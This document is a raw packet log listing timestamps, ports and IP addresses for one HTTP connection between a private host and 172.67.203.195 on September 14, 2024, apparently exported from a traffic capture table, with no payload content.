Sep 14, 2024 18:31:14.220802069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220813990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220827103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220835924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220865011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220896006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220906973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220917940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220927954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220962048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220987082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220993996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221005917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221014977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221024990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221035957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221045971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221055031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221059084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.221081018 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.221112013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.221122026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221174955 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.221177101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221189022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221232891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.221349955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221359968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221369028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221379042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221388102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221398115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221406937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221415997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221426964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221427917 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.221436024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221446037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.221447945 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.221478939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225189924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225199938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225209951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225219011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225250959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225272894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225284100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225291967 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225330114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225346088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225356102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225367069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225375891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225384951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225397110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225409985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225420952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225438118 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225469112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225476027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225486040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225532055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225564957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225574017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225584030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225594044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225604057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225614071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225624084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225642920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225646019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225653887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.225670099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.225723982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.281616926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281634092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281644106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281675100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281686068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281696081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281704903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.281749964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281760931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281765938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.281807899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.281873941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281883955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281893015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281903982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281913996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281929970 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.281963110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.281976938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281985998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.281996012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282006025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282015085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282031059 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.282072067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.282144070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282154083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282164097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282174110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282185078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282195091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282207012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282212973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.282243967 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.282296896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282306910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282315969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282325983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282335997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282346964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282351017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.282358885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282367945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.282393932 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.282424927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.306888103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.306941986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.306952000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.306952000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.306993008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307101965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307111979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307121992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307131052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307146072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307156086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307167053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307176113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307178974 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307187080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307198048 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307199001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307229042 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307260036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307312965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307322979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307327986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307337999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307362080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307373047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307393074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307404041 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307404041 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307425976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307434082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307437897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307501078 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307566881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307578087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307586908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307595968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307610035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307620049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307630062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307640076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307648897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307656050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307687044 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307692051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307703018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307708025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307769060 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307857037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307868004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307876110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307885885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307895899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307905912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307914019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307915926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307928085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307938099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307950020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307960033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.307966948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.307988882 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.308031082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.308124065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308134079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308142900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308165073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308173895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308185101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308185101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.308240891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.308276892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308288097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308296919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308310032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308320999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308336020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308341026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.308347940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308357000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308367968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308370113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.308377981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308398962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308408022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308412075 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.308418036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308429003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308433056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.308439016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308451891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.308470011 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.308489084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312028885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312046051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312055111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312103987 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312138081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312146902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312155008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312158108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312191010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312196016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312200069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312248945 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312258005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312302113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312311888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312319040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312356949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312366962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312369108 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312378883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312388897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312438965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312459946 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312463045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312474012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312484026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312500000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312510014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312529087 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312536001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312546968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.312551975 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.312593937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.359632015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.368551970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368561029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368571043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368722916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368731976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368737936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368742943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368748903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368752956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368757963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368762970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368767977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368853092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368861914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368953943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368963003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368961096 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.368968964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368973970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368980885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.368988037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.369103909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.369112968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.369129896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.369139910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.369149923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.369159937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.369169950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.369180918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.369189978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.369322062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.369322062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.369322062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.393953085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394100904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394166946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394176006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394191027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394200087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394203901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394213915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394218922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394223928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394236088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394246101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394251108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394259930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394263983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394305944 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394330025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394337893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394349098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394360065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394366980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394376040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394386053 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394395113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394399881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394445896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394460917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394471884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394527912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394586086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394597054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394607067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394617081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394628048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394638062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394661903 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394695044 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394697905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394710064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394720078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394730091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394741058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394756079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394793987 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394794941 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394855022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394865036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394874096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394884109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394895077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394905090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394912958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.394915104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394926071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.394941092 CEST	49738	80	192.168.2.4	172.67.203.195
